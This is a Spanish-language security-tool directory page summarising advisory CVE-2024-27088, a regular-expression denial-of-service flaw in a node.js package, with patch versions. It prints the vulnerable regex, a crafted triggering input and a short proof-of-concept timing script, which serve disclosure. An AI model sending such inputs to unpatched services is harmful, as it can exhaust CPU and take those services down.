Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-27088 — redos | Kitploit
Herramientas/GitHubGitHub/200101whoami/cve-2024-27088
Análisis EstáticoAnálisis de VulnerabilidadesAnálisis de CódigoPapers e InvestigaciónAprendizaje y Educación
GitHub200101whoami/cve-2024-27088

CVE-2024-27088

redos

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-27088

Resumen de la vulnerabilidad

  • CVE-2024-27088

  • Feb 26, 2024

  • ReDoS en el paquete node.js

  • Como parte del proyecto rebob

Descripción de la vulnerabilidad

github advisories

root@kitploit:~
/^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/

Esta vulnerabilidad puede explotarse cuando hay un desequilibrio en los paréntesis, lo que resulta en un retroceso excesivo y posteriormente aumenta la carga de la CPU y el tiempo de procesamiento de manera significativa. Esta vulnerabilidad se puede desencadenar utilizando la siguiente entrada:

'function{' + 'n'.repeat(31) + '){'

Aquí hay un código PoC simple para demostrar el problema:

root@kitploit:~
const protocolre = /^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/;

const startTime = Date.now();
const maliciousInput = 'function{' + 'n'.repeat(31) + '){'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");

Impacto

Pasar funciones con nombres muy largos o nombres de argumentos predeterminados complejos a function#copy o function#toStringTokens puede hacer que el script se detenga

Parches Corregido con 3551cdd y a52e957 Publicado con v0.10.63

Soluciones alternativas No hay una solución alternativa real aparte de abstenerse de usar las utilidades anteriores.

issue target package

Descargar herramienta